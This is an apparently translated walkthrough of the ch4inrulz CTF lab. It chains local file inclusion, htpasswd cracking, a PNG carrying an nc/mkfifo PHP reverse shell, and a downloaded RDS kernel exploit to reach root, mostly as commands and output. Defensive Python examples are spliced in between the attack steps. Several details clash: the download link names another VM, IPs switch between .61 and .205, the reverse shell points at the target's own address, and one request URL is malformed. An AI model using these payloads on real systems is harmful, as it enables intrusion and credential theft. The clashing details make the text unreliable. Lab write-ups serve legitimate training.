Environment
VM name: ch4inrulz: 1.0.1
Release date: 31 July 2018
Author: askar
Series: ch4inrulz
Description:
Frank has a small website. He is a smart developer with a normal security background, and he always likes to follow patterns. Your goal is to discover any critical vulnerability and gain access to the system, then obtain root access to capture the root flag.
This machine was built for Jordan's Top Hacker 2018 CTF; we tried to make it simulate real-world attacks so as to improve your penetration testing skills.
The machine was tested on VMware (Player/Workstation) without any problems, so we recommend running it with VMware; VirtualBox should also work fine.
Difficulty: intermediate. You need to think outside the box and collect all the puzzle pieces to get the job done.
The machine has DHCP enabled, so you will not run into any network problems.
v1 - 25/07/2018; v1.0.1 - 31/07/2018 fixed the DHCP issue.
Download: https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/
Information gathering
Try a series of information gathering techniques.
System port information
```bash
$ nmap -sN 192.168.123.1/24
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-02 01:48 CST
Nmap scan report for Sec.lan (192.168.123.1)
Host is up (0.018s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
53/tcp open|filtered domain
80/tcp open|filtered http
1688/tcp open|filtered nsjtp-data
MAC Address: D4:5F:25:EB:89:20 (Shenzhen Youhua Technology)
Nmap scan report for 192.168.123.61
Host is up (0.00016s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
21/tcp open|filtered ftp
22/tcp open|filtered ssh
80/tcp open|filtered http
8011/tcp open|filtered unknown
MAC Address: 08:00:27:62:AE:D0 (Oracle VirtualBox virtual NIC)
Nmap scan report for 5332.lan (192.168.123.157)
Host is up (0.0039s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
62078/tcp open|filtered iphone-sync
MAC Address: BC:9F:EF:DE:DE:DE (Apple)
Nmap scan report for 192.168.123.61
Host is up (0.0000080s latency).
All 1000 scanned ports on 192.168.123.61 are closed
Nmap done: 256 IP addresses (4 hosts up) scanned in 44.72 seconds
## root @ Sec in ~ [1:49:33]
$ nmap -A -p- 192.168.123.61
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-02 01:51 CST
Nmap scan report for ubuntu.lan (192.168.123.61)
Host is up (0.00042s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.5
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.123.61
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 5
| vsFTPd 2.3.5 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d4:f8:c1:55:92:75:93:f7:7b:65:dd:2b:94:e8:bb:47 (DSA)
| 2048 3d:24:ea:4f:a2:2a:ca:63:b7:f4:27:0f:d9:17:03:22 (RSA)
|_ 256 e2:54:a7:c7:ef:aa:8c:15:61:20:bd:aa:72:c0:17:88 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: FRANK's Website | Under development
8011/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:62:AE:D0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.19 - 2.6.36
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.42 ms ubuntu.lan (192.168.123.61)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.66 seconds
```
- The target IP is 192.168.123.61. Port 80 is open, so following the usual approach, test the website first.
Website information
```bash
$ dirb http://192.168.123.61
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Nov 2 01:52:38 2018
URL_BASE: http://192.168.123.61/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.123.61/ ----
+ http://192.168.123.61/cgi-bin/ (CODE:403|SIZE:290)
==> DIRECTORY: http://192.168.123.61/css/
+ http://192.168.123.61/development (CODE:401|SIZE:481)
==> DIRECTORY: http://192.168.123.61/img/
+ http://192.168.123.61/index (CODE:200|SIZE:334)
+ http://192.168.123.61/index.html (CODE:200|SIZE:13516)
==> DIRECTORY: http://192.168.123.61/js/
+ http://192.168.123.61/LICENSE (CODE:200|SIZE:1093)
+ http://192.168.123.61/robots (CODE:200|SIZE:21)
+ http://192.168.123.61/robots.txt (CODE:200|SIZE:21)
+ http://192.168.123.61/server-status (CODE:403|SIZE:295)
==> DIRECTORY: http://192.168.123.61/vendor/
---- Entering directory: http://192.168.123.61/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.123.61/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.123.61/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.123.61/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Fri Nov 2 01:52:39 2018
DOWNLOADED: 4612 - FOUND: 8
```
Testing 8011
Port 80 gives nothing for now, so I turn to 8011 and find what looks like a development site.
```bash
$ dirb http://192.168.123.61:8011 /usr/share/wordlists/dirb/big.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Nov 2
URL_BASE: http://192.168.123.61:8011/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://192.168.123.61:8011/ ----
==> DIRECTORY: http://192.168.123.61:8011/api/
+ http://192.168.123.61:8011/server-status (CODE:403|SIZE:297)
---- Entering directory: http://192.168.123.61:8011/api/ ----
-----------------
END_TIME: Fri Nov 2
DOWNLOADED: 40916 - FOUND: 1
```
Opening http://192.168.123.61:8011/api/ shows the following content on the page.
- web_api.php
- records_api.php
- files_api.php
- database_api.php
- I tried them one by one and finally determined that files_api.php is the one worth working on.
File inclusion vulnerability
Testing shows that /api/files_api.php accepts a file name submitted via a curl POST and returns that file's contents.
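A defender's counterpart to the API above, as an added Python example (not code from this machine or its author): a file-serving handler that resolves the requested name inside one fixed web root and refuses anything that names a stream wrapper or URL scheme, escapes the root, or is not an allowlisted static file. The helper names, the extension allowlist and the constructed sample web root are assumptions made for the demonstration.

```python
import os
import re
import tempfile

# Only static pages are ever served, and only from one directory (assumption).
ALLOWED_EXTENSIONS = {".html", ".txt"}
# A "scheme:" prefix (php:, data:, http:, file:, ...) selects a PHP stream
# wrapper or a remote resource, never a file under the web root.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*:", re.IGNORECASE)


def resolve_request(base_dir, requested):
    """Return ("ok", absolute_path) or ("rejected", reason)."""
    if not requested or "\x00" in requested:
        return "rejected", "empty name or NUL byte"
    if SCHEME_RE.match(requested):
        return "rejected", "stream wrapper or URL scheme"
    base = os.path.realpath(base_dir)
    # Strip leading slashes so an absolute name is still joined under base,
    # then let realpath collapse any ../ segments and symlinks.
    candidate = os.path.realpath(os.path.join(base, requested.lstrip("/\\")))
    if os.path.commonpath([base, candidate]) != base:
        return "rejected", "path escapes web root"
    if os.path.splitext(candidate)[1].lower() not in ALLOWED_EXTENSIONS:
        return "rejected", "extension not allowed"
    if not os.path.isfile(candidate):
        return "rejected", "not a regular file"
    return "ok", candidate


def serve(base_dir, requested):
    """What the API handler would return for the 'file' parameter."""
    status, detail = resolve_request(base_dir, requested)
    if status != "ok":
        return status, detail
    with open(detail, encoding="utf-8") as fh:
        return "ok", fh.read()


def build_demo_root():
    """Constructed sample web root: one page and one script next to it."""
    root = tempfile.mkdtemp(prefix="files_api_demo_")
    with open(os.path.join(root, "index.html"), "w", encoding="utf-8") as fh:
        fh.write("<h1>index</h1>")
    with open(os.path.join(root, "upload.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php echo 'not served'; ?>")
    return root


if __name__ == "__main__":
    root = build_demo_root()
    for name in ("index.html", "upload.php", "/etc/passwd",
                 "../../../../etc/passwd",
                 "php://filter/convert.base64-encode/resource=upload.php"):
        print(f"{name!r:60} -> {serve(root, name)}")
```

The order of checks matters: the scheme test runs before any path handling, because `os.path.join` would happily treat `php://filter/...` as a relative name, and the containment test compares canonical paths so that `..` and symlinks cannot point outside the root.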
Obtaining user account information
The curl request is:
```bash
curl -s -d "file=/etc/passwd" "http://192.168.123.205:8011/api/files_api.php"
```
The content obtained:
```bash
./exp.sh /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
frank:x:1000:1000:frank,,,:/home/frank:/bin/bash
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:103:111:ftp daemon,,,:/srv/ftp:/bin/false
```
- Looking at the user list, frank stands out; it looks like the web user, with home directory /home/frank.
Obtaining .htaccess
Using HackBar again, request .htaccess:
http://192.168.123.61:8011/api/files_api.php?http:%2f%2f192.168.123.61:8011%2fapi%2ffiles_api.php
The content obtained:
```bash
AuthUserFile /etc/.htpasswd
AuthName "Frank Development Area"
AuthType Basic
AuthGroupFile /dev/null
```
- There is a .htpasswd; read that as well; it appears to hold the login credentials for the development site.
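How the requests in this section would look from the server side, as an added Python example that is not part of the original writeup: a small scanner over Apache access-log lines that flags inclusion indicators (traversal, stream wrappers, remote URLs, sensitive file names) in the request path. The log lines are constructed for the demonstration (client addresses, timestamps and sizes are invented), and the indicator list is an assumption, not a rule set from any product. The curl requests sent with `-d` are POSTs whose bodies never reach the access log, so the scanner also counts POSTs per client to the same script; that count is the only trace such requests leave without body logging or a WAF.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Apache common/combined log prefix (assumed default format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Indicators of local/remote file inclusion attempts in a request line.
INDICATORS = {
    "stream_wrapper": re.compile(r"\b(php|data|phar|expect|zip)://", re.I),
    "remote_url": re.compile(r"\b(https?|ftp)://", re.I),
    "traversal": re.compile(r"(\.\./|\.\.\\)"),
    "sensitive_file": re.compile(r"/etc/(passwd|shadow)|\.htpasswd|\.htaccess", re.I),
}

# Constructed sample log; addresses, timestamps and sizes are invented.
SAMPLE_LOG = [
    '192.168.123.1 - - [02/Nov/2018:02:10:01 +0800] "GET /api/files_api.php?file=../../../../etc/passwd HTTP/1.1" 200 1837',
    '192.168.123.1 - - [02/Nov/2018:02:10:05 +0800] "GET /api/files_api.php?file=php://filter/convert.base64-encode/resource=upload.php HTTP/1.1" 200 3902',
    '192.168.123.1 - - [02/Nov/2018:02:10:09 +0800] "GET /api/files_api.php?http:%2f%2f192.168.123.61:8011%2fapi%2ffiles_api.php HTTP/1.1" 200 512',
    '192.168.123.1 - - [02/Nov/2018:02:11:00 +0800] "POST /api/files_api.php HTTP/1.1" 200 1837',
    '192.168.123.1 - - [02/Nov/2018:02:11:01 +0800] "POST /api/files_api.php HTTP/1.1" 200 512',
    '192.168.123.1 - - [02/Nov/2018:02:11:02 +0800] "POST /api/files_api.php HTTP/1.1" 200 3902',
    '192.168.123.50 - - [02/Nov/2018:02:12:00 +0800] "GET /index.html HTTP/1.1" 200 13516',
]


def scan_line(line):
    """Parse one line and list the indicator names matching its request path."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode twice: %2f hides a slash, %252f hides the %2f.
    decoded = unquote(unquote(m["path"]))
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))
    return {"ip": m["ip"], "method": m["method"], "path": m["path"], "hits": hits}


def find_inclusion_attempts(lines):
    """Lines whose request path carries at least one indicator."""
    parsed = (scan_line(line) for line in lines)
    return [p for p in parsed if p and p["hits"]]


def post_bursts(lines, script, threshold):
    """POST bodies are not logged, so count POSTs per client to the script instead."""
    counts = Counter()
    for line in lines:
        p = scan_line(line)
        if p and p["method"] == "POST" and p["path"].split("?")[0] == script:
            counts[p["ip"]] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for hit in find_inclusion_attempts(SAMPLE_LOG):
        print(hit["ip"], hit["hits"], hit["path"])
    print(post_bursts(SAMPLE_LOG, "/api/files_api.php", 3))
```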
Obtaining .htpasswd
The content obtained: frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0
Identify the hash type:
```bash
hash-identifier
HASH: $apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0
Possible Hashs:
[+] MD5(APR)
-------------------------------------------------------------------------
HASH: ^CTraceback (most recent call last):
File "/usr/bin/hash-identifier", line 556, in <module>
hash = raw_input(" HASH: ")
KeyboardInterrupt
```
Cracking with john
Crack the hash with john, or with an online service.
```bash
$ john hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
frank!!! (frank)
1g 0:00:00:00 DONE 1/3 (2018-11-02 03:50) 100.0g/s 18800p/s 18800c/s 18800C/s frank!!..fr4nk
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```
Upload vulnerability
Log in to /development/ with the cracked password; it shows the following.
- Here is my unfinished tools list
- the uploader tool (finished but need security review)
We open http://192.168.123.61/development/uploader/ and it loads. The rest is straightforward.
Upload directory analysis
Capturing the request reveals upload.php, and the directory is located at /var/www/development/uploader/.
Next, use the inclusion vulnerability to read the upload script's source.
```bash
$ curl -s -d "file=php://filter/convert.base64-encode/resource=/var/www/development/uploader/upload.php" "http://192.168.123.205:8011/api/files_api.php"
<head>
<title>franks website | simple website browser API</title>
</head>
PD9waHAKJHRhcmdldF9kaXIgPSAiRlJBTkt1cGxvYWRzLyI7CiR0YXJnZXRfZmlsZSA9ICR0YXJnZXRfZGlyIC4gYmFzZW5hbWUoJF9GSUxFU1siZmlsZVRvVXBsb2FkIl1bIm5hbWUiXSk7CiR1cGxvYWRPayA9IDE7CiRpbWFnZUZpbGVUeXBlID0gc3RydG9sb3dlcihwYXRoaW5mbygkdGFyZ2V0X2ZpbGUsUEFUSElORk9fRVhURU5TSU9OKSk7Ci8vIENoZWNrIGlmIGltYWdlIGZpbGUgaXMgYSBhY3R1YWwgaW1hZ2Ugb3IgZmFrZSBpbWFnZQppZihpc3NldCgkX1BPU1RbInN1Ym1pdCJdKSkgewogICAgJGNoZWNrID0gZ2V0aW1hZ2VzaXplKCRfRklMRVNbImZpbGVUb1VwbG9hZCJdWyJ0bXBfbmFtZSJdKTsKICAgIGlmKCRjaGVjayAhPT0gZmFsc2UpIHsKICAgICAgICBlY2hvICJGaWxlIGlzIGFuIGltYWdlIC0gIiAuICRjaGVja1sibWltZSJdIC4gIi4iOwogICAgICAgICR1cGxvYWRPayA9IDE7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIkZpbGUgaXMgbm90IGFuIGltYWdlLiI7CiAgICAgICAgJHVwbG9hZE9rID0gMDsKICAgIH0KfQovLyBDaGVjayBpZiBmaWxlIGFscmVhZHkgZXhpc3RzCmlmIChmaWxlX2V4aXN0cygkdGFyZ2V0X2ZpbGUpKSB7CiAgICBlY2hvICJTb3JyeSwgZmlsZSBhbHJlYWR5IGV4aXN0cy4iOwogICAgJHVwbG9hZE9rID0gMDsKfQovLyBDaGVjayBmaWxlIHNpemUKaWYgKCRfRklMRVNbImZpbGVUb1VwbG9hZCJdWyJzaXplIl0gPiA1MDAwMDApIHsKICAgIGVjaG8gIlNvcnJ5LCB5b3VyIGZpbGUgaXMgdG9vIGxhcmdlLiI7CiAgICAkdXBsb2FkT2sgPSAwOwp9Ci8vIEFsbG93IGNlcnRhaW4gZmlsZSBmb3JtYXRzCmlmKCRpbWFnZUZpbGVUeXBlICE9ICJqcGciICYmICRpbWFnZUZpbGVUeXBlICE9ICJwbmciICYmICRpbWFnZUZpbGVUeXBlICE9ICJqcGVnIgomJiAkaW1hZ2VGaWxlVHlwZSAhPSAiZ2lmIiApIHsKICAgIGVjaG8gIlNvcnJ5LCBvbmx5IEpQRywgSlBFRywgUE5HICYgR0lGIGZpbGVzIGFyZSBhbGxvd2VkLiI7CiAgICAkdXBsb2FkT2sgPSAwOwp9Ci8vIENoZWNrIGlmICR1cGxvYWRPayBpcyBzZXQgdG8gMCBieSBhbiBlcnJvcgppZiAoJHVwbG9hZE9rID09IDApIHsKICAgIGVjaG8gIlNvcnJ5LCB5b3VyIGZpbGUgd2FzIG5vdCB1cGxvYWRlZC4iOwovLyBpZiBldmVyeXRoaW5nIGlzIG9rLCB0cnkgdG8gdXBsb2FkIGZpbGUKfSBlbHNlIHsKICAgIGlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZVRvVXBsb2FkIl1bInRtcF9uYW1lIl0sICR0YXJnZXRfZmlsZSkpIHsKICAgICAgICBlY2hvICJUaGUgZmlsZSAiLiBiYXNlbmFtZSggJF9GSUxFU1siZmlsZVRvVXBsb2FkIl1bIm5hbWUiXSkuICIgaGFzIGJlZW4gdXBsb2FkZWQgdG8gbXkgdXBsb2FkcyBwYXRoLiI7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIlNvcnJ5LCB0aGVyZSB3YXMgYW4gZXJyb3IgdXBsb2FkaW5nIHlvdXIgZmlsZS4iOwogICAgfQp9Cj8+Cgo=
```
Base64 decode
```bash
$ echo <base64 string above> | base64 --decode
<?php
$target_dir = "FRANKuploads/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
$uploadOk = 1;
$imageFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));
// Check if image file is a actual image or fake image
if(isset($_POST["submit"])) {
    $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
    if($check !== false) {
        echo "File is an image - " . $check["mime"] . ".";
        $uploadOk = 1;
    } else {
        echo "File is not an image.";
        $uploadOk = 0;
    }
}
// Check if file already exists
if (file_exists($target_file)) {
    echo "Sorry, file already exists.";
    $uploadOk = 0;
}
// Check file size
if ($_FILES["fileToUpload"]["size"] > 500000) {
    echo "Sorry, your file is too large.";
    $uploadOk = 0;
}
// Allow certain file formats
if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg"
&& $imageFileType != "gif" ) {
    echo "Sorry, only JPG, JPEG, PNG & GIF files are allowed.";
    $uploadOk = 0;
}
// Check if $uploadOk is set to 0 by an error
if ($uploadOk == 0) {
    echo "Sorry, your file was not uploaded.";
// if everything is ok, try to upload file
} else {
    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
        echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded to my uploads path.";
    } else {
        echo "Sorry, there was an error uploading your file.";
    }
}
?>
```
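Added example, not the page's or the author's code: the validation that the upload.php above attempts, rewritten in Python so it can be run stand-alone and compared with the original. Two weaknesses visible in the PHP are addressed: the getimagesize() check only runs when a submit field is present, so a request without that field is never content-checked, and the client-supplied filename is used as-is on disk. The function names, the constructed PNG sample, the upload directory and the byte-pattern check for PHP tags are assumptions made for the demonstration.

```python
import os
import re
import secrets
import tempfile

MAX_BYTES = 500000  # same limit as the original script

# Leading bytes each accepted format must start with.
SIGNATURES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# PHP open tags anywhere in the body. A byte-pattern check is a stopgap;
# re-encoding the image through an image library removes payloads more reliably.
PHP_TAG_RE = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)

# Constructed sample: a PNG signature followed by filler, not a real picture.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64


def validate_upload(filename, data):
    """Return (True, ext) when the upload is acceptable, else (False, reason)."""
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    if ext not in SIGNATURES:
        return False, "extension not allowed"
    if len(data) > MAX_BYTES:
        return False, "too large"
    # Content is checked unconditionally, not only when a 'submit' field is present.
    if not any(data.startswith(sig) for sig in SIGNATURES[ext]):
        return False, "content does not match extension"
    if PHP_TAG_RE.search(data):
        return False, "embedded PHP tag"
    return True, ext


def store_upload(upload_dir, filename, data):
    """Write an accepted upload under a server-chosen name; return (name, status)."""
    ok, detail = validate_upload(filename, data)
    if not ok:
        return None, detail
    # The client's filename never reaches the filesystem, so no collision
    # check is needed and no traversal characters can sneak through.
    new_name = secrets.token_hex(16) + "." + detail
    with open(os.path.join(upload_dir, new_name), "wb") as fh:
        fh.write(data)
    return new_name, "stored"


def demo_store(filename, data):
    """Store into a fresh temporary directory and report whether the file landed."""
    target = tempfile.mkdtemp(prefix="uploads_")  # assumed to be outside the web root
    name, status = store_upload(target, filename, data)
    exists = name is not None and os.path.isfile(os.path.join(target, name))
    return name, status, exists


if __name__ == "__main__":
    print(demo_store("pass.png", PNG_SAMPLE))
    print(demo_store("pass.png", PNG_SAMPLE + b"<?php echo 1; ?>"))
    print(demo_store("shell.php", PNG_SAMPLE))
```

Even with these checks, the upload directory should not be reachable by any code path that includes or executes its contents; the chain on this page works because the file-reading API does exactly that.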
Exploitation
Generate and upload a shell
We upload a shell directly; a tool like China Chopper (菜刀) would do, but here I use an nc reverse shell one-liner.
```bash
echo "<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.123.61 8143 >/tmp/f') ?>" >> pass.png
```
- During testing I found that this upload filters out PHP content, so we prepend an image header to get past the restriction; pass.png is a normal image.
Getting a shell
Start an nc listener
Trigger the reverse shell with curl
```bash
curl -X POST http://192.168.123.205:8011/api/files_api.php --data "file=/var/www/development/uploader/FRANKuploads/pass.png"
```
The nc reverse shell connects
```bash
connect to [192.168.123.61] from (UNKNOWN) [192.168.123.205] 49514
/bin/sh: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@ubuntu:/var/anotherwww/api$ ls
ls
files_api.php index.html
www-data@ubuntu:/var/anotherwww/api$ cd /tmp
cd /tmp
www-data@ubuntu:/tmp$ ls
ls
f rev
www-data@ubuntu:/tmp$ uname -a
uname -a
Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64 GNU/Linux
```
- Shell obtained, but it is only a low-privilege account; we need to escalate privileges.
Privilege escalation
Searching for exploits
Search for kernel exploits with searchsploit.
```bash
$ searchsploit Kernel 2.6.3
--------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < | exploits/linux/local/9844.py
Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 | exploits/linux/local/19933.rb
Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' | exploits/linux/local/33321.c
Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe | exploits/linux/local/40812.c
Linux Kernel 2.6.27 < 2.6.36 (RedHat x | exploits/linux_x86-64/local/15024.c
Linux Kernel 2.6.3 - 'setsockopt' Loca | exploits/linux/dos/274.c
Linux Kernel 2.6.30 - 'atalk_getname() | exploits/linux/local/9521.c
Linux Kernel 2.6.30 - 'tun_chr_pool()' | exploits/linux/dos/33088.txt
Linux Kernel 2.6.30 < 2.6.30.1 / SELin | exploits/linux/local/9191.txt
Linux Kernel 2.6.31 - 'perf_counter_op | exploits/linux/dos/33228.txt
Linux Kernel 2.6.31-rc5 - sigaltstack | exploits/linux/local/9352.c
Linux Kernel 2.6.31-rc7 - 'AF_LLC gets | exploits/linux/local/9513.c
Linux Kernel 2.6.31.4 - 'unix_stream_c | exploits/linux/dos/10022.c
Linux Kernel 2.6.32 (Ubuntu 10.04) - ' | exploits/linux/local/41770.txt
Linux Kernel 2.6.32 - 'pipe.c' Local P | exploits/linux/local/10018.sh
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) | exploits/linux/local/25444.c
Linux Kernel 2.6.32-5 (Debian 6.0.5) - | exploits/linux/local/24459.sh
Linux Kernel 2.6.32-642/3.16.0-4 - 'in | exploits/linux/dos/40819.c
Linux Kernel 2.6.32-rc1 (x86-64) - Reg | exploits/linux_x86-64/local/40811.c
Linux Kernel 2.6.33.3 - SCTP INIT Remo | exploits/linux/dos/14594.py
Linux Kernel 2.6.34 - 'find_keyring_by | exploits/linux/dos/33886.txt
Linux Kernel 2.6.35 - Network Namespac | exploits/linux/dos/36425.txt
Linux Kernel 2.6.36 - VIDIOCSMICROCODE | exploits/linux/local/15344.c
Linux Kernel 2.6.36 IGMP - Remote Deni | exploits/linux/dos/18378.c
Linux Kernel 2.6.36-rc8 - 'RDS Protoco | exploits/linux/local/15285.c
Linux Kernel 2.6.37 (RedHat / Ubuntu 1 | exploits/linux/local/15704.c
Linux Kernel 2.6.37 - 'setup_arg_pages | exploits/linux/dos/15619.c
Linux Kernel 2.6.37 - Local Kernel Den | exploits/linux/dos/16263.c
Linux Kernel 2.6.37 - Unix Sockets Loc | exploits/linux/dos/15622.c
Linux Kernel 2.6.37-rc1 - 'serial_mult | exploits/linux/local/18080.c
Linux Kernel 2.6.39 < 3.2.2 (Gentoo / | exploits/linux/local/18411.c
Linux Kernel 2.6.39 < 3.2.2 (x86/x64) | exploits/linux/local/35161.c
Linux Kernel < 2.6.30.5 - 'cfg80211' R | exploits/linux/dos/9442.c
Linux Kernel < 2.6.31-rc4 - 'nfs4_proc | exploits/linux/dos/10202.c
Linux Kernel < 2.6.31-rc7 - 'AF_IRDA' | exploits/linux/local/9543.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x8 | exploits/linux/local/15944.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x8 | exploits/linux_x86/local/15916.c
Linux Kernel < 2.6.36-rc1 (Ubuntu 10.0 | exploits/linux/local/14814.c
Linux Kernel < 2.6.36-rc4-git2 (x86-64 | exploits/linux_x86-64/local/15023.c
Linux Kernel < 2.6.36-rc6 (RedHat / Ub | exploits/linux/local/15150.c
Linux Kernel < 2.6.36.2 (Ubuntu 10.04) | exploits/linux/local/17787.c
Linux Kernel < 2.6.37-rc2 - 'ACPI cust | exploits/linux/local/15774.c
Linux Kernel < 2.6.37-rc2 - 'TCP_MAXSE | exploits/linux/dos/16952.c
Linux/MIPS Kernel 2.6.36 - 'NetUSB' Re | exploits/multiple/remote/38454.py
ReiserFS (Linux Kernel 2.6.34-rc3 / Re | exploits/linux/local/12130.py
--------------------------------------- ----------------------------------------
Shellcodes: No Result
```
- Many results; use exploits/linux/local/15285.c.
Upload the exploit and escalate
Change to the exploit directory and start a simple web server.
```bash
$ cd /usr/share/exploitdb/exploits/linux/local
## root @ Sec in /usr/share/exploitdb/exploits/linux/local
$ python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
```
In the reverse shell window, download the PoC, then compile and run it.
```bash
www-data@ubuntu:/tmp$ wget http://192.168.123.61/15285.c
wget http://192.168.123.61/15285.c
--2018-11-02 03:59:21-- http://192.168.123.61/15285.c
Connecting to 192.168.123.61:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7155 (7.0K) [text/plain]
Saving to: `15285.c'
100%[======================================>] 7,155 --.-K/s in 0.003s
2018-11-02 03:59:21 (2.57 MB/s) - `15285.c' saved [7155/7155]
www-data@ubuntu:/tmp$ ls
ls
15285.c f rev
www-data@ubuntu:/tmp$ gcc 15285.c
gcc 15285.c
www-data@ubuntu:/tmp$ ls
ls
15285.c a.out f rev
www-data@ubuntu:/tmp$ gcc 15285.c -o exp
gcc 15285.c -o exp
www-data@ubuntu:/tmp$ ls
ls
15285.c a.out exp f rev
www-data@ubuntu:/tmp$ ./exp
./exp
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xffffffff81ce8df0
[+] Resolved default_security_ops to 0xffffffff81a523e0
[+] Resolved cap_ptrace_traceme to 0xffffffff8125db60
[+] Resolved commit_creds to 0xffffffff810852b0
[+] Resolved prepare_kernel_cred to 0xffffffff81085780
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
## ls
ls
